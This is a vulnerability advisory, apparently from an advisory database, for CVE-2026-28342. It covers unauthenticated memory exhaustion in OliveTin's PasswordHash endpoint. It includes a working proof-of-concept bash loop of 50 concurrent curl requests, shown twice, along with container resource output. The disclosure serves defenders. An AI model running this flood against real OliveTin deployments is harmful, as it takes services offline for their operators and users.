GHSA-PC8G-78PF-4XRP
Vulnerability from github – Published: 2026-03-02 18:49 – Updated: 2026-03-05 22:49Summary
The PasswordHash API endpoint allows unauthenticated users to trigger excessive memory allocation by sending concurrent password hashing requests. By issuing multiple parallel requests, an attacker can exhaust available container memory, leading to service degradation or complete denial of service (DoS).
The issue occurs because the endpoint performs computationally and memory-intensive hashing operations without request throttling, authentication requirements, or resource limits.
Details
The vulnerable endpoint:
POST /api/olivetin.api.v1.OliveTinApiService/PasswordHash
accepts a JSON body containing a password field and returns a computed password hash.
Each request triggers a memory-intensive hashing operation. When multiple concurrent requests are sent, memory consumption increases significantly. There are no safeguards such as:
- Authentication requirements
- Rate limiting
- Request throttling
- Memory usage caps per request
- Concurrency controls
As a result, an attacker can repeatedly invoke the endpoint in parallel, causing excessive RAM allocation inside the container.
In a test environment, 50 concurrent requests resulted in approximately 3.2 GB of memory usage (≈64 MB per request), leading to service instability.
This behavior allows unauthenticated attackers to perform a denial of service attack by exhausting server memory resources.
PoC
Environment
- Docker container: olivetin-test
- Exposed API on: http://localhost:1337
- Default configuration (no authentication enabled)
Reproduction Steps
Run the following script to send 50 concurrent requests:
for i in $(seq 1 50); do
curl -s -X POST http://localhost:1337/api/olivetin.api.v1.OliveTinApiService/PasswordHash \
-H "Content-Type: application/json" \
-d "{\"password\":\"flood-$i\"}" &
done
docker stats olivetin-test --no-stream
wait
┌──(root㉿kali)-[~/cve/OliveTin]
└─# docker stats olivetin-test --no-stream
CONTAINER ID NAME CPU % MEM USAGE / LIMIT MEM % NET I/O BLOCK I/O PIDS
18509670bf3e olivetin-test 344.63% 6.189GiB / 7.753GiB 79.83% 313kB / 288kB 4.31MB / 106MB 7
Docker CPU is 344.63%
Impact
This vulnerability allows unauthenticated remote attackers to:
- Exhaust server memory
- Crash the service
- Cause availability loss
- Trigger container termination in orchestrated environments
This is a Denial of Service (DoS) vulnerability affecting service availability.
Production deployments without reverse proxy rate limiting (e.g., Nginx, Traefik) are especially at risk.
{
"affected": [
{
"package": {
"ecosystem": "Go",
"name": "github.com/OliveTin/OliveTin"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "0.0.0-20260227002407-2eb5f0ba79d4"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-28342"
],
"database_specific": {
"cwe_ids": [
"CWE-400",
"CWE-770"
],
"github_reviewed": true,
"github_reviewed_at": "2026-03-02T18:49:27Z",
"nvd_published_at": "2026-03-05T20:16:15Z",
"severity": "HIGH"
},
"details": "## Summary\n\nThe PasswordHash API endpoint allows unauthenticated users to trigger excessive memory allocation by sending concurrent password hashing requests. By issuing multiple parallel requests, an attacker can exhaust available container memory, leading to service degradation or complete denial of service (DoS).\n\nThe issue occurs because the endpoint performs computationally and memory-intensive hashing operations without request throttling, authentication requirements, or resource limits.\n\n## Details\n\nThe vulnerable endpoint:\n\n`POST /api/olivetin.api.v1.OliveTinApiService/PasswordHash`\n\naccepts a JSON body containing a password field and returns a computed password hash.\n\nEach request triggers a memory-intensive hashing operation. When multiple concurrent requests are sent, memory consumption increases significantly. There are no safeguards such as:\n\n- Authentication requirements\n- Rate limiting\n- Request throttling\n- Memory usage caps per request\n- Concurrency controls\n\nAs a result, an attacker can repeatedly invoke the endpoint in parallel, causing excessive RAM allocation inside the container.\n\nIn a test environment, 50 concurrent requests resulted in approximately 3.2 GB of memory usage (\u224864 MB per request), leading to service instability.\n\nThis behavior allows unauthenticated attackers to perform a denial of service attack by exhausting server memory resources.\n\n## PoC\nEnvironment\n\n- Docker container: olivetin-test\n- Exposed API on: http://localhost:1337\n- Default configuration (no authentication enabled)\n\n## Reproduction Steps\n\nRun the following script to send 50 concurrent requests:\n\n```bash\nfor i in $(seq 1 50); do\n curl -s -X POST http://localhost:1337/api/olivetin.api.v1.OliveTinApiService/PasswordHash \\\n -H \"Content-Type: application/json\" \\\n -d \"{\\\"password\\\":\\\"flood-$i\\\"}\" \u0026\ndone\ndocker stats olivetin-test --no-stream\nwait\n```\n\n```bash\n\u250c\u2500\u2500(root\u327fkali)-[~/cve/OliveTin]\n\u2514\u2500# docker stats olivetin-test --no-stream\nCONTAINER ID NAME CPU % MEM USAGE / LIMIT MEM % NET I/O BLOCK I/O PIDS\n18509670bf3e olivetin-test 344.63% 6.189GiB / 7.753GiB 79.83% 313kB / 288kB 4.31MB / 106MB 7\n\n```\n\n`Docker CPU is 344.63%`\n\n### Impact\n\nThis vulnerability allows unauthenticated remote attackers to:\n\n- Exhaust server memory\n- Crash the service\n- Cause availability loss\n- Trigger container termination in orchestrated environments\n\nThis is a Denial of Service (DoS) vulnerability affecting service availability.\n\nProduction deployments without reverse proxy rate limiting (e.g., Nginx, Traefik) are especially at risk.",
"id": "GHSA-pc8g-78pf-4xrp",
"modified": "2026-03-05T22:49:13Z",
"published": "2026-03-02T18:49:27Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/OliveTin/OliveTin/security/advisories/GHSA-pc8g-78pf-4xrp"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-28342"
},
{
"type": "WEB",
"url": "https://github.com/OliveTin/OliveTin/commit/2eb5f0ba79d4bbef3c802bf8b4666a7e18dcfd90"
},
{
"type": "PACKAGE",
"url": "https://github.com/OliveTin/OliveTin"
},
{
"type": "WEB",
"url": "https://github.com/OliveTin/OliveTin/releases/tag/3000.10.2"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"type": "CVSS_V3"
}
],
"summary": "OliveTin has Unauthenticated Denial of Service via Memory Exhaustion in PasswordHash API Endpoint"
}
Sightings
| Author | Source | Type | Date |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or observed by the user.
- Confirmed: The vulnerability has been validated from an analyst's perspective.
- Published Proof of Concept: A public proof of concept is available for this vulnerability.
- Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
- Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
- Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
- Not confirmed: The user expressed doubt about the validity of the vulnerability.
- Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.